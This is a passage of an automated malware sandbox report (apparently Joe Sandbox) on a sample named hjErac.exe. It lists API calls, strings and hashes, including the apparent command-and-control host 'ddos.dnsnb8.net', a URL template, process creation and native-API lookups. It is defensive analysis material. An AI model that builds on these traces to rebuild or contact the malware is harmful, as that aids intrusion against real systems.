                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00CB1400), ref: 00CB130A
                                                                              Strings
                                                                              • ntdll.dll, xrefs: 00CB1219
                                                                              • C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB1262
                                                                              • ZwQuerySystemInformation, xrefs: 00CB1212
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$ZwQuerySystemInformation$ntdll.dll
                                                                              • API String ID: 1500695312-1605623530
                                                                              • Opcode ID: e19b01afa5e3d69d7e20a0ca36b0238018307c4885e8aba3c9111e7cf0a5b700
                                                                              • Instruction ID: a9c46880b542618aa2853314bb6b0be41ccf01b4ee14ab85c90400aba9710151
                                                                              • Opcode Fuzzy Hash: e19b01afa5e3d69d7e20a0ca36b0238018307c4885e8aba3c9111e7cf0a5b700
                                                                              • Instruction Fuzzy Hash: 23213671744351EBD720AF65DC18BAFBBA8FF85B10F880A18F945D6240D370DA40C7A6
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
                                                                              • srand.MSVCRT ref: 00CB1878
                                                                              • rand.MSVCRT ref: 00CB1880
                                                                              • srand.MSVCRT ref: 00CB1890
                                                                              • rand.MSVCRT ref: 00CB1894
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: Timerandsrand$FileSystem
                                                                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                                              • API String ID: 4106363736-3273462101
                                                                              • Opcode ID: 836d0cd13c5e3490266264c167ceba36a060315a6fda7b4adfc974f0c067a265
                                                                              • Instruction ID: d624569ce82b67a33301b371810bac59d33797738cc8a63e2723ad7063375608
                                                                              • Opcode Fuzzy Hash: 836d0cd13c5e3490266264c167ceba36a060315a6fda7b4adfc974f0c067a265
                                                                              • Instruction Fuzzy Hash: B0E01277A14218BBDB00A7A9FC46A9EBBACDE84161F110666F600D3254E974F9448AB4
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,00CB29DB,?,00000001), ref: 00CB26A7
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,00CB29DB,?,00000001), ref: 00CB26B5
                                                                              • lstrlen.KERNEL32(?), ref: 00CB26C4
                                                                              • ??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00CB26CE
                                                                              • lstrcpy.KERNEL32(00000004,?), ref: 00CB26E3
                                                                              • lstrcpy.KERNEL32(?,00000004), ref: 00CB271F
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00CB272D
                                                                              • SetEvent.KERNEL32 ref: 00CB273C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                              • String ID:
                                                                              • API String ID: 41106472-0
                                                                              • Opcode ID: d5d349e8014c9c57648bbf9de24c812d1579323b2dda9f047000bda67611664c
                                                                              • Instruction ID: c23e44461d2a3de4dd780dc5ac46caf1d0a72b779952ada9c11df98a599cb076
                                                                              • Opcode Fuzzy Hash: d5d349e8014c9c57648bbf9de24c812d1579323b2dda9f047000bda67611664c
                                                                              • Instruction Fuzzy Hash: EC119035508160EFCB21AF25EC48B9FBBA9FF84721F104216F85497121DB309A86DB50
                                                                              APIs
                                                                              • srand.MSVCRT ref: 00CB1BCD
                                                                              • rand.MSVCRT ref: 00CB1BD8
                                                                              • memset.MSVCRT ref: 00CB1C43
                                                                              • memcpy.MSVCRT(?,zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00CB1C4F
                                                                              • lstrcat.KERNEL32(?,.exe), ref: 00CB1C5D
                                                                              Strings
                                                                              • zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF, xrefs: 00CB1B8A, 00CB1B9C, 00CB1C15, 00CB1C49
                                                                              • .exe, xrefs: 00CB1C57
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcatmemcpymemsetrandsrand
                                                                              • String ID: .exe$zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF
                                                                              • API String ID: 122620767-4250208734
                                                                              • Opcode ID: 871c8582f599f3145d1f86c25ae2e5d38f920de7db04ba3c6ecf5834ae3289ee
                                                                              • Instruction ID: ff3b6dc60f09fff6172f9b83c7a0fa099800091d932ba87e3af4c083acdcfabe
                                                                              • Opcode Fuzzy Hash: 871c8582f599f3145d1f86c25ae2e5d38f920de7db04ba3c6ecf5834ae3289ee
                                                                              • Instruction Fuzzy Hash: D9218E32F481E06FE71A1335BC60BEE3F44DFA3B11F1D01A9FE950B193D1640A828260
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00CB18B1
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00CB18D3
                                                                              • CloseHandle.KERNEL32(00CB2549), ref: 00CB18E9
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB18F0
                                                                              • GetExitCodeProcess.KERNEL32(?,00CB2549), ref: 00CB1901
                                                                              • CloseHandle.KERNEL32(?), ref: 00CB190A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                              • String ID:
                                                                              • API String ID: 876959470-0
                                                                              • Opcode ID: 8d5b489ee62d1dfe260636e57c965dfe2b5371067c3f5a664ba28f13f48603e8
                                                                              • Instruction ID: f8c29177fc85138fc36f4e858ec76fa38d8fbf2e453770a26b94ad7d4d9e66e5
                                                                              • Opcode Fuzzy Hash: 8d5b489ee62d1dfe260636e57c965dfe2b5371067c3f5a664ba28f13f48603e8
                                                                              • Instruction Fuzzy Hash: 1A018F72901168BBCB21ABD6EC48EDFBF3DFF85770F104121FA15A51A0D6315A18CBA0
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00CB1334
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CB133B
                                                                              • memset.MSVCRT ref: 00CB1359
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcmemset
                                                                              • String ID: NtSystemDebugControl$ntdll.dll
                                                                              • API String ID: 3137504439-2438149413
                                                                              • Opcode ID: 87f07c0cc8d71cd192965888f5803709d6c7e7ac48b38c6141efad1e49a68642
                                                                              • Instruction ID: 2a203f91b3f0e85099be2dd1be5bcad457e0e6e080603c5b0066ff0c6f7d94fa
                                                                              • Opcode Fuzzy Hash: 87f07c0cc8d71cd192965888f5803709d6c7e7ac48b38c6141efad1e49a68642
                                                                              • Instruction Fuzzy Hash: 0C016D71A04309AFDB10DF99AC85AAFBBACFB51314F44422AF912A2151E2709605CA51
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                              • String ID:
                                                                              • API String ID: 3636361484-0
                                                                              • Opcode ID: 89e26cb7f568602f871c19376fe85cc725a2e9199f99d457224b3e387b49f0fc
                                                                              • Instruction ID: 5fda34a2d8b1aafe3b09cb28518a11395d4bec999257d45efb02093c85985ea6
                                                                              • Opcode Fuzzy Hash: 89e26cb7f568602f871c19376fe85cc725a2e9199f99d457224b3e387b49f0fc
                                                                              • Instruction Fuzzy Hash: 9301AEB29082556FDF106760EC4DBDA77DCDF05351F540066DD45D3090D674EF848BA0
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00CB603C
                                                                              • GetProcAddress.KERNEL32(00000000,00CB6064), ref: 00CB604F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: kernel32.dll
                                                                              • API String ID: 1646373207-1793498882
                                                                              • Opcode ID: d5a2100cbc41b4bdecec5b080981ecc3d6b049fefa482cd486ccbff9f8765e79
                                                                              • Instruction ID: 78e63074d49b89a659cc024c2e9d0fff188706d9e7c8b7e24e9f466a4d09553d
                                                                              • Opcode Fuzzy Hash: d5a2100cbc41b4bdecec5b080981ecc3d6b049fefa482cd486ccbff9f8765e79
                                                                              • Instruction Fuzzy Hash: 37F0F6B11442898FEF70CE64CC44BDE37E4EB05700F50443AE909CB241CB3886058B14